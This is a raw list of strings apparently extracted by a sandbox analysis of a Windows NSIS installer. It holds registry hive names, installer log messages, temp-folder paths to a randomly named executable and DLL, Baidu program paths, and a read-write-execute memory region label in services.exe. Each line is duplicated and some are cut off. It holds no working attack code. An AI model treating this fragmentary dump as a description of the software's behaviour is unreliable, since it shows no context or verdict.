Skipping section: "%s"
Skipping section: "%s"
Section: "%s"
Section: "%s"
New install of "%s" to "%s"
New install of "%s" to "%s"
.DEFAULT\Control Panel\International
.DEFAULT\Control Panel\International
Software\Microsoft\Windows\CurrentVersion
Software\Microsoft\Windows\CurrentVersion
*?|/":
*?|/":
invalid registry key
invalid registry key
HKEY_DYN_DATA
HKEY_DYN_DATA
HKEY_CURRENT_CONFIG
HKEY_CURRENT_CONFIG
HKEY_PERFORMANCE_DATA
HKEY_PERFORMANCE_DATA
HKEY_USERS
HKEY_USERS
HKEY_LOCAL_MACHINE
HKEY_LOCAL_MACHINE
HKEY_CURRENT_USER
HKEY_CURRENT_USER
HKEY_CLASSES_ROOT
HKEY_CLASSES_ROOT
x%c
x%c
RMDir: RemoveDirectory failed("%s")
RMDir: RemoveDirectory failed("%s")
RMDir: RemoveDirectory on Reboot("%s")
RMDir: RemoveDirectory on Reboot("%s")
RMDir: RemoveDirectory("%s")
RMDir: RemoveDirectory("%s")
RMDir: RemoveDirectory invalid input("%s")
RMDir: RemoveDirectory invalid input("%s")
Delete: DeleteFile failed("%s")
Delete: DeleteFile failed("%s")
Delete: DeleteFile on Reboot("%s")
Delete: DeleteFile on Reboot("%s")
Delete: DeleteFile("%s")
Delete: DeleteFile("%s")
%s: failed opening file "%s"
%s: failed opening file "%s"
LOCALS~1\Temp\nsw1A.tmp\tmpt5zprs.dll
LOCALS~1\Temp\nsw1A.tmp\tmpt5zprs.dll
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsw1A.tmp\tmpt5zprs.dll
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsw1A.tmp\tmpt5zprs.dll
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsw1A.tmp
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsw1A.tmp
spkjrjp_30279.exe"
spkjrjp_30279.exe"
Nullsoft Install System v2.46.5-Unicode
Nullsoft Install System v2.46.5-Unicode
%Program Files%\Baidu\
%Program Files%\Baidu\
sw1A.tmp
sw1A.tmp
File: skipped: "C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsw1A.tmp\tmpt5zprs.dll" (overwriteflag=1)
File: skipped: "C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsw1A.tmp\tmpt5zprs.dll" (overwriteflag=1)
p\tmpt5zprs.dll"
p\tmpt5zprs.dll"
:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsi3.tmp\spkjrjp_30279.exe"
:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsi3.tmp\spkjrjp_30279.exe"
"C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsi3.tmp\spkjrjp_30279.exe"
"C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsi3.tmp\spkjrjp_30279.exe"
%Program Files%\Baidu\BaiduSd
%Program Files%\Baidu\BaiduSd
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsi3.tmp
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsi3.tmp
spkjrjp_30279.exe
spkjrjp_30279.exe
CUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsr18.tmp
CUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsr18.tmp
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsi3.tmp\spkjrjp_30279.exe
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsi3.tmp\spkjrjp_30279.exe
302647013
302647013
1.0.9.757
1.0.9.757
services.exe_756_rwx_00AE0000_00001000:
%Program Files%\Baidu\BaiduAn\2.3.0.2225\bd0001.dll
%Program Files%\Baidu\BaiduAn\2.3.0.2225\bd0001.dll